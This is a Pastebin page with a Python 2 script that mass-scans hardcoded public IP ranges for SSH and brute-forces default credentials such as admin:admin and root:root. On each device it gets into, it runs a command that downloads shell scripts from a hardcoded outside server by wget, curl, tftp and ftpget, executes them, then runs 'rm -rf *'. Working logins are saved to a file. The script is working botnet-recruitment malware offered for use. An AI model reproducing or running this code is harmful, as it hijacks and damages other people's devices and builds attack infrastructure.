Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # peethon scanner kek
- # python scan.py 500 LUCKY 1 1
- # heck the internet ez pz
- import threading, paramiko, random, socket, time, sys
- paramiko.util.log_to_file("/dev/null")
- server_ip = ""
- blacklisted = ["127.0","10.0","192.168"]
- passwords = ["admin:admin", "support:support", "root:root", "admin:1234", "user:user"]
- if sys.argv[4] == "1":
- passwords = ["support:support", "admin:admin", "root:root", "admin:1234", "user:user"]
- if sys.argv[4] == "2":
- passwords = ["admin:admin"]
- if sys.argv[4] == "3":
- passwords = ["root:root"]
- if len(sys.argv) < 4:
- sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
- print """\n\x1b[0;37m*******************************************************************************
- * \x1b[1;31m Matt's \x1b[1;35m 1337 \x1b[1;31m scanner \x1b[0;37m *
- *******************************************************************************\x1b[0m"""
- def sshscanner(ip):
- global passwords
- try:
- thisipisbad='no'
- for badip in blacklisted:
- if badip in ip:
- thisipisbad='yes'
- if thisipisbad=='yes':
- sys.exit()
- username='root'
- password="0"
- port = 22
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3)
- s.connect((ip, port))
- data = str(s.recv(1024))
- if "SSH" in data:
- print("\x1b[1;34m SSH OPEN ON--> " + ip + "\x1b[37m")
- elif "ssh" in data:
- print("\x1b[1;34m SSH OPEN ON--> " + ip + "\x1b[37m")
- else:
- sys.exit()
- s.close()
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- dobreak=False
- for passwd in passwords:
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- ssh.connect(ip, port = port, username=username, password=password, timeout=3)
- break
- except:
- pass
- badserver=True
- stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
- output = stdout.read()
- if "inet addr" in output:
- badserver=False
- websites = [ ]
- if badserver == False:
- print("\x1b[1;33mLoading " + ip + ": \x1b[1;34m[" + username + "] : [" + password + "]\x1b[36m")
- ssh.exec_command('cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.145.169/bins.sh; curl -O http://80.211.145.169/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 80.211.145.169 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 80.211.145.169; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.211.145.169 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *')
- vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
- time.sleep(12)
- ssh.close()
- except Exception as e:
- pass
- if sys.argv[2] == "LUCKY":
- ranges = ["191.81.0.0/191.82.255.255", "186.33.0.0/186.33.255.255", "178.45.0.0/178.47.255.255", "31.162.0.0/31.163.255.255", "5.140.0.0/5.141.255.255", "90.150.0.0/90.151.255.255", "94.50.0.0/94.51.255.255", "37.76.0.0/37.76.255.255", "176.51.0.0/176.51.255.255", "2.60.0.0/2.60.255.255", "201.178.0.0/201.178.255.255", "181.22.0.0/181.22.255.255", "190.233.0.0/190.233.255.255", "118.173.0.0/118.173.255.255", "212.64.0.0/212.64.255.255", "95.188.0.0/95.188.255.255", "179.36.0.0/179.36.255.255"]
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- if sys.argv[2] != "LUCKY":
- a = int(sys.argv[2].split(".")[0])
- b = int(sys.argv[2].split(".")[1])
- c = int(sys.argv[2].split(".")[2])
- d = int(sys.argv[2].split(".")[3])
- else:
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- x = 0
- while(True):
- try:
- if sys.argv[2] != "LUCKY":
- endaddr = sys.argv[3]
- else:
- endaddr = endrng
- d += 1
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if d > 255:
- c += 1
- d = 0
- if c > 255:
- b += 1
- c = 0
- if b > 255:
- a += 1
- b = 0
- ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
- if ipaddr == endaddr:
- if sys.argv[2] == "LUCKY":
- randomrange = random.choice(ranges)
- startrng = randomrange.split("/")[0]
- endrng = randomrange.split("/")[1]
- a = int(startrng.split(".")[0])
- b = int(startrng.split(".")[1])
- c = int(startrng.split(".")[2])
- d = int(startrng.split(".")[3])
- else:
- break
- if x > 500:
- time.sleep(1)
- x = 0
- t = threading.Thread(target=sshscanner, args=(ipaddr,))
- t.start()
- except Exception as e:
- pass
- print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement